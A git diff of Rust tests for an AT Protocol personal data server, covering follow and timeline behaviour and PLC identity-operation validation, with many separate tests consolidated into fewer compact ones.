.bearer_auth(&bob_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get timeline");
|
||||
assert_eq!(timeline_res.status(), StatusCode::OK);
|
||||
let timeline_body: Value = timeline_res.json().await.unwrap();
|
||||
let feed = timeline_body["feed"].as_array().unwrap();
|
||||
assert_eq!(feed.len(), 1, "Should see 1 post from Alice");
|
||||
let follow_rkey = follow_uri.split('/').last().unwrap();
|
||||
let unfollow_payload = json!({
|
||||
"repo": bob_did,
|
||||
"collection": "app.bsky.graph.follow",
|
||||
"rkey": follow_rkey
|
||||
});
|
||||
client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.repo.deleteRecord",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&bob_jwt)
|
||||
.json(&unfollow_payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to unfollow");
|
||||
tokio::time::sleep(Duration::from_secs(1)).await;
|
||||
let timeline_after_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&bob_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get timeline after unfollow");
|
||||
assert_eq!(timeline_after_res.status(), StatusCode::OK);
|
||||
let timeline_after: Value = timeline_after_res.json().await.unwrap();
|
||||
let feed_after = timeline_after["feed"].as_array().unwrap();
|
||||
assert_eq!(feed_after.len(), 0, "Should see 0 posts after unfollowing");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_mutual_follow_lifecycle() {
|
||||
let client = client();
|
||||
let (alice_did, alice_jwt) = setup_new_user("alice-mutual").await;
|
||||
let (bob_did, bob_jwt) = setup_new_user("bob-mutual").await;
|
||||
create_follow(&client, &alice_did, &alice_jwt, &bob_did).await;
|
||||
create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
|
||||
create_post(&client, &alice_did, &alice_jwt, "Alice's post for mutual").await;
|
||||
create_post(&client, &bob_did, &bob_jwt, "Bob's post for mutual").await;
|
||||
tokio::time::sleep(Duration::from_secs(1)).await;
|
||||
let alice_timeline_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&alice_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get Alice's timeline");
|
||||
assert_eq!(alice_timeline_res.status(), StatusCode::OK);
|
||||
let alice_tl: Value = alice_timeline_res.json().await.unwrap();
|
||||
let alice_feed = alice_tl["feed"].as_array().unwrap();
|
||||
assert_eq!(alice_feed.len(), 1, "Alice should see Bob's 1 post");
|
||||
let bob_timeline_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&bob_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get Bob's timeline");
|
||||
assert_eq!(bob_timeline_res.status(), StatusCode::OK);
|
||||
let bob_tl: Value = bob_timeline_res.json().await.unwrap();
|
||||
let bob_feed = bob_tl["feed"].as_array().unwrap();
|
||||
assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_account_to_post_full_lifecycle() {
|
||||
let client = client();
|
||||
|
||||
1544
tests/oauth.rs
1544
tests/oauth.rs
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -5,454 +5,127 @@ use serde_json::json;
|
||||
use sqlx::PgPool;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_request_plc_operation_signature_requires_auth() {
|
||||
async fn test_plc_operation_auth() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
|
||||
.send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_request_plc_operation_signature_success() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
|
||||
.json(&json!({})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.json(&json!({ "operation": {} })).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
let (token, _) = create_account_and_login(&client).await;
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
|
||||
.bearer_auth(&token).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_sign_plc_operation_requires_auth() {
|
||||
async fn test_sign_plc_operation_validation() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.signPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.json(&json!({}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_sign_plc_operation_requires_token() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.signPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
let (token, _) = create_account_and_login(&client).await;
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_sign_plc_operation_invalid_token() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.signPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"token": "invalid-token-12345"
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_requires_auth() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.json(&json!({
|
||||
"operation": {}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_invalid_operation() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"operation": {
|
||||
"type": "invalid_type"
|
||||
}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_missing_sig() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"operation": {
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_wrong_service_endpoint() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"operation": {
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": ["did:key:z123"],
|
||||
"verificationMethods": {"atproto": "did:key:z456"},
|
||||
"alsoKnownAs": ["at://wrong.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://wrong.example.com"
|
||||
}
|
||||
},
|
||||
"prev": null,
|
||||
"sig": "fake_signature"
|
||||
}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_request_plc_operation_creates_token_in_db() {
|
||||
async fn test_submit_plc_operation_validation() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({
|
||||
"operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
|
||||
"alsoKnownAs": [], "services": {}, "prev": null }
|
||||
})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let handle = did.split(':').last().unwrap_or("user");
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({
|
||||
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
|
||||
"verificationMethods": { "atproto": "did:key:z456" },
|
||||
"alsoKnownAs": [format!("at://{}", handle)],
|
||||
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": "https://wrong.example.com" } },
|
||||
"prev": null, "sig": "fake_signature" }
|
||||
})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({
|
||||
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:zWrongRotationKey123"],
|
||||
"verificationMethods": { "atproto": "did:key:zWrongVerificationKey456" },
|
||||
"alsoKnownAs": [format!("at://{}", handle)],
|
||||
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
|
||||
"prev": null, "sig": "fake_signature" }
|
||||
})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation"));
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({
|
||||
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
|
||||
"verificationMethods": { "atproto": "did:key:z456" },
|
||||
"alsoKnownAs": ["at://totally.wrong.handle"],
|
||||
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
|
||||
"prev": null, "sig": "fake_signature" }
|
||||
})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
|
||||
.bearer_auth(&token).json(&json!({
|
||||
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
|
||||
"verificationMethods": { "atproto": "did:key:z456" },
|
||||
"alsoKnownAs": ["at://user"],
|
||||
"services": { "atproto_pds": { "type": "WrongServiceType", "endpoint": format!("https://{}", hostname) } },
|
||||
"prev": null, "sig": "fake_signature" }
|
||||
})).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_plc_token_lifecycle() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
|
||||
.bearer_auth(&token).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let db_url = get_db_connection_string().await;
|
||||
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
|
||||
let pool = PgPool::connect(&db_url).await.unwrap();
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
SELECT t.token, t.expires_at
|
||||
FROM plc_operation_tokens t
|
||||
JOIN users u ON t.user_id = u.id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
"SELECT t.token, t.expires_at FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1",
|
||||
did
|
||||
)
|
||||
.fetch_optional(&pool)
|
||||
.await
|
||||
.expect("Query failed");
|
||||
).fetch_optional(&pool).await.unwrap();
|
||||
assert!(row.is_some(), "PLC token should be created in database");
|
||||
let row = row.unwrap();
|
||||
assert!(
|
||||
row.token.len() == 11,
|
||||
"Token should be in format xxxxx-xxxxx"
|
||||
);
|
||||
assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx");
|
||||
assert!(row.token.contains('-'), "Token should contain hyphen");
|
||||
assert!(
|
||||
row.expires_at > chrono::Utc::now(),
|
||||
"Token should not be expired"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_request_plc_operation_replaces_existing_token() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
let res1 = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.send()
|
||||
.await
|
||||
.expect("Request 1 failed");
|
||||
assert_eq!(res1.status(), StatusCode::OK);
|
||||
let db_url = get_db_connection_string().await;
|
||||
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
|
||||
let token1 = sqlx::query_scalar!(
|
||||
r#"
|
||||
SELECT t.token
|
||||
FROM plc_operation_tokens t
|
||||
JOIN users u ON t.user_id = u.id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.expect("Query failed");
|
||||
let res2 = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.send()
|
||||
.await
|
||||
.expect("Request 2 failed");
|
||||
assert_eq!(res2.status(), StatusCode::OK);
|
||||
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
|
||||
let diff = row.expires_at - chrono::Utc::now();
|
||||
assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes");
|
||||
let token1 = row.token.clone();
|
||||
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
|
||||
.bearer_auth(&token).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let token2 = sqlx::query_scalar!(
|
||||
r#"
|
||||
SELECT t.token
|
||||
FROM plc_operation_tokens t
|
||||
JOIN users u ON t.user_id = u.id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.expect("Query failed");
|
||||
"SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
|
||||
).fetch_one(&pool).await.unwrap();
|
||||
assert_ne!(token1, token2, "Second request should generate a new token");
|
||||
let count: i64 = sqlx::query_scalar!(
|
||||
r#"
|
||||
SELECT COUNT(*) as "count!"
|
||||
FROM plc_operation_tokens t
|
||||
JOIN users u ON t.user_id = u.id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.expect("Count query failed");
|
||||
"SELECT COUNT(*) as \"count!\" FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
|
||||
).fetch_one(&pool).await.unwrap();
|
||||
assert_eq!(count, 1, "Should only have one token per user");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_wrong_verification_method() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
let hostname =
|
||||
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
|
||||
let handle = did.split(':').last().unwrap_or("user");
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"operation": {
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": ["did:key:zWrongRotationKey123"],
|
||||
"verificationMethods": {"atproto": "did:key:zWrongVerificationKey456"},
|
||||
"alsoKnownAs": [format!("at://{}", handle)],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": format!("https://{}", hostname)
|
||||
}
|
||||
},
|
||||
"prev": null,
|
||||
"sig": "fake_signature"
|
||||
}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
assert!(
|
||||
body["message"]
|
||||
.as_str()
|
||||
.unwrap_or("")
|
||||
.contains("signing key")
|
||||
|| body["message"].as_str().unwrap_or("").contains("rotation"),
|
||||
"Error should mention key mismatch: {:?}",
|
||||
body
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_wrong_handle() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let hostname =
|
||||
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"operation": {
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": ["did:key:z123"],
|
||||
"verificationMethods": {"atproto": "did:key:z456"},
|
||||
"alsoKnownAs": ["at://totally.wrong.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": format!("https://{}", hostname)
|
||||
}
|
||||
},
|
||||
"prev": null,
|
||||
"sig": "fake_signature"
|
||||
}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_submit_plc_operation_wrong_service_type() {
|
||||
let client = client();
|
||||
let (token, _did) = create_account_and_login(&client).await;
|
||||
let hostname =
|
||||
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.submitPlcOperation",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.json(&json!({
|
||||
"operation": {
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": ["did:key:z123"],
|
||||
"verificationMethods": {"atproto": "did:key:z456"},
|
||||
"alsoKnownAs": ["at://user"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "WrongServiceType",
|
||||
"endpoint": format!("https://{}", hostname)
|
||||
}
|
||||
},
|
||||
"prev": null,
|
||||
"sig": "fake_signature"
|
||||
}
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_plc_token_expiry_format() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&token)
|
||||
.send()
|
||||
.await
|
||||
.expect("Request failed");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let db_url = get_db_connection_string().await;
|
||||
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
|
||||
let row = sqlx::query!(
|
||||
r#"
|
||||
SELECT t.expires_at
|
||||
FROM plc_operation_tokens t
|
||||
JOIN users u ON t.user_id = u.id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_one(&pool)
|
||||
.await
|
||||
.expect("Query failed");
|
||||
let now = chrono::Utc::now();
|
||||
let expires = row.expires_at;
|
||||
let diff = expires - now;
|
||||
assert!(
|
||||
diff.num_minutes() >= 9,
|
||||
"Token should expire in ~10 minutes, got {} minutes",
|
||||
diff.num_minutes()
|
||||
);
|
||||
assert!(
|
||||
diff.num_minutes() <= 11,
|
||||
"Token should expire in ~10 minutes, got {} minutes",
|
||||
diff.num_minutes()
|
||||
);
|
||||
}
|
||||
|
||||
@@ -13,9 +13,7 @@ fn create_valid_operation() -> serde_json::Value {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {
|
||||
"atproto": did_key.clone()
|
||||
},
|
||||
"verificationMethods": { "atproto": did_key.clone() },
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
@@ -29,444 +27,161 @@ fn create_valid_operation() -> serde_json::Value {
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_valid() {
|
||||
fn test_plc_operation_basic_validation() {
|
||||
let op = create_valid_operation();
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(result.is_ok());
|
||||
assert!(validate_plc_operation(&op).is_ok());
|
||||
|
||||
let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
|
||||
assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
|
||||
|
||||
let invalid_type = json!({ "type": "invalid_type", "sig": "test" });
|
||||
assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
|
||||
|
||||
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
|
||||
assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
|
||||
|
||||
let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
|
||||
assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
|
||||
|
||||
let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" });
|
||||
assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
|
||||
|
||||
let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" });
|
||||
assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
|
||||
|
||||
let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" });
|
||||
assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
|
||||
|
||||
assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_type() {
|
||||
let op = json!({
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_invalid_type() {
|
||||
let op = json!({
|
||||
"type": "invalid_type",
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_sig() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {}
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_rotation_keys() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_verification_methods() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(
|
||||
matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_also_known_as() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"services": {},
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_missing_services() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"sig": "test"
|
||||
